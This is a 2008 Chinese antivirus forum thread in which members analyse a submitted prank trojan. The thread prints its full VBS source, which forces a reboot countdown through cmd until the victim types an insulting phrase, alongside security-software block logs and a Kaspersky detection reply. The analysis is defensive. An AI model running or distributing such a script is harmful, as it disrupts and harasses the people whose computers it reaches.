卡饭论坛 » 病毒样本区 » 过红伞,过微点的一个可疑文件

免费的安全盛宴 \| 关于安全软件的12个谣言和误会~	卡巴官方最新正式版 \| 官方最新测试版	帮助他人，快乐自己 \| 助人者，人助之	91款国外杀毒软件官方介绍附优秀文章
论坛常见问题解答 \| 相逢在论坛	从杀毒软件到文化 \| 我们为什么要装防火墙	hips新手入门 \| 卡饭HIPS教程集合	病毒样本区 \| 费尔区

15 12 ››

打印

[病毒样本] 过红伞,过微点的一个可疑文件

昔我往矣

长城号空间站

卡饭_小有名气

Rank: 2

e=mc2

帖子: 772
积分: 932
技术值: 0
魅力值: 0
人气值: 3
防御装备: eqsyssecure
来自: 未来
注册时间: 2008-3-9

1楼大中小发表于 2008-8-16 17:09 只看该作者

[小贴士]“杀软误报”帖发布格式_发现可能的误报请按此格式发布

过红伞,过微点的一个可疑文件

Tags: 红伞文件扫描 infected 密码

右键扫描没反应,微点直接过,打开后,自动关机,建压缩包也自动关机了一次(解压密码:infected)

附件: 您所在的用户组无法下载或查看附件

TOP

下载您所需要的计算机安全软件_杀毒软件_防火墙_HIPS_安全软件套装

qianwenxiang

卡饭_版主

Rank: 7 Rank: 7 Rank: 7

rp急转直下中

帖子: 4316
积分: 7480
技术值: 0
魅力值: 10
人气值: 68
防御装备: AAV
来自: 安徽芜湖
注册时间: 2007-1-22

KaFan Hunters:冷静独立交流

2楼大中小发表于 2008-8-16 17:18 只看该作者

[推荐阅读]迈进HIPS的瑰丽花园

又见这个VBS...

复制内容到剪贴板

代码:

 on error resume next

 dim WSHshellA

 set WSHshellA = wscript.createobject("wscript.shell")

 WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""我是SB，我爱你，不喊我是SB，我爱你就一分钟关你机，不信，试试···"" ",0 ,true  

 dim a

 do while(a <> "我是SB，我爱你")

 a = inputbox ("我是SB，我爱你,就不关机，快撒，喊 ""我是SB，我爱你""　","喊不喊","不喊",8000,7000)

 msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"

 loop

msgbox chr(13) + chr(13) + chr(13) + "早喊不就行了嘛"

dim WSHshell

set WSHshell = wscript.createobject("wscript.shell")

WSHshell.run "cmd.exe /c shutdown -a",0 ,true  

msgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈，真过瘾"

Click Me

TOP

xxwpk007

卡饭_见习写手

Rank: 3 Rank: 3

帖子: 1098
积分: 2517
技术值: 0
魅力值: 0
人气值: 0
防御装备: EQ
来自: 卡饭圣殿骑士团
注册时间: 2007-2-13

3楼大中小发表于 2008-8-16 18:10 只看该作者

2008-08-16 18:08:38 运行应用程序操作:阻止
进程路径:C:\WINDOWS\System32\WScript.exe
文件路径:C:\WINDOWS\system32\cmd.exe
命令行:/c shutdown -r -t 60 -c "我是SB，我爱你，不喊我是SB，我爱你就一分钟关你机，不信，试试···"
触发规则:所有程序规则->*

TOP

卡饭学院电子书系列之五---主机入侵防御系统（HIPS）入门和使用

sbbdms

从9月份开始休假，归来时间未定

卡饭_见习写手

Rank: 3 Rank: 3

休假中的病毒上报者

帖子: 1653
积分: 2948
技术值: 0
魅力值: 2
人气值: 10
防御装备: KAV7.0.0.125
注册时间: 2007-7-29

4楼大中小发表于 2008-8-16 18:12 只看该作者

又是一个搞笑VBS……
Kaspersky miss
TO KL

TOP

小邪邪

Artemis

卡饭_版主

Rank: 7 Rank: 7 Rank: 7

月下夜想曲

帖子: 7691
积分: 13015
技术值: 6
魅力值: 20
人气值: 14
防御装备: 一杯咖啡
来自: Moonlight
注册时间: 2006-9-30

二级技术勋章金点子勋章杰出卡饭勋章蜜蜂勋章

5楼大中小发表于 2008-8-16 18:18 只看该作者

查不出但防得住

mcafee后台自动拦截：
2008-8-16 18:15:30
已由访问保护规则禁止
AD 禁止在本机执行可疑的脚本文件
已阻止的操作: 执行

（这个脚本试图调用很多系统核心模块）

[ 本帖最后由小邪邪于 2008-8-16 18:19 编辑 ]

附件: 您所在的用户组无法下载或查看附件

TOP

sbbdms

从9月份开始休假，归来时间未定

卡饭_见习写手

Rank: 3 Rank: 3

休假中的病毒上报者

帖子: 1653
积分: 2948
技术值: 0
魅力值: 2
人气值: 10
防御装备: KAV7.0.0.125
注册时间: 2007-7-29

6楼大中小发表于 2008-8-16 18:51 只看该作者

Hello,

####.vbe_ - Trojan.VBS.Shutdown.s

New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.

Please quote all when answering.

--
Best regards, Vyacheslav Zakorzhevsky
Virus analyst, Kaspersky Lab.
e-mail: newvirus@kaspersky.com
http://www.kaspersky.com/

http://www.kaspersky.com/virusscanner - free online virus scanner.
http://www.kaspersky.com/helpdesk.html - technical support.

> Attachment: ????.rar

TOP

qigang

绣花针落地

KaFan Hunters

Rank: 7 Rank: 7 Rank: 7

每周三、四工作原因休假！

帖子: 9952
积分: 9976
技术值: 0
魅力值: 0
人气值: 0
防御装备: 瑞星杀毒软件2008单机版
来自: 浙江绍兴
注册时间: 2007-8-12

KaFan Hunters:冷静独立交流

7楼大中小发表于 2008-8-16 18:52 只看该作者

1/0

RS20.57.52未杀！

中国剑盟社区病毒样本区：http://bbs.janmeng.com/forumdisplay.php?fid=109
个人教育博客：http://bub443worn905.blog.163.com/edit/（欢迎光临）

TOP

tvuser2007

保持低调&沉默

样本区热心卡饭

Rank: 6 Rank: 6

浪费青春

帖子: 4845
积分: 5706
技术值: 0
魅力值: 4
人气值: 5
防御装备: KAV 8.0.0.454
来自: 020
注册时间: 2007-2-1

8楼大中小发表于 2008-8-16 18:58 只看该作者

不让调用cmd就哑火了~

附件: 您所在的用户组无法下载或查看附件

TOP

尤金卡巴斯基

卡饭_实习版主

Rank: 6 Rank: 6

帖子: 10776
积分: 16165
技术值: 0
魅力值: 27
人气值: 63
防御装备: KIS 2009
注册时间: 2007-10-21

9楼大中小发表于 2008-8-16 20:07 只看该作者

MISS，已上报

卡巴斯基病毒上报邮箱：newvirus@kaspersky.com

TOP

浪滔天

卡饭_著名写手

Rank: 3 Rank: 3

帖子: 2546
积分: 4219
技术值: 4
魅力值: 0
人气值: 13
防御装备
注册时间: 2006-10-13

10楼 大中小发表于 2008-8-16 20:27 只看该作者

运行后卡巴 2009 提示：

附件: 您所在的用户组无法下载或查看附件

TOP

‹‹ 上一主题 | 下一主题 ››

15 12 ››

免费的安全盛宴 \| 关于安全软件的12个谣言和误会~	卡巴官方最新正式版 \| 官方最新测试版	帮助他人，快乐自己 \| 助人者，人助之	91款国外杀毒软件官方介绍附优秀文章
论坛常见问题解答 \| 相逢在论坛	从杀毒软件到文化 \| 我们为什么要装防火墙	hips新手入门 \| 卡饭HIPS教程集合	病毒样本区 \| 费尔区